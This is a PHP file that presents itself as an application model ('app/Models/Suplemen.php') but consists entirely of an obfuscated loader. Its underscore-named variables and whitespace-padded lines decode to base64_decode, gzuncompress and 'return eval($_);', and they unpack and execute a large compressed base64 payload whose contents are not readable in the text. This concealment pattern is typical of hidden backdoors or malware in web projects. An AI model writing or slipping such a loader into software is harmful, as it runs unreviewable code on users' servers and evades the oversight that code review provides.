<?php 
        $__='printf';$_='Loading app/Models/Suplemen.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
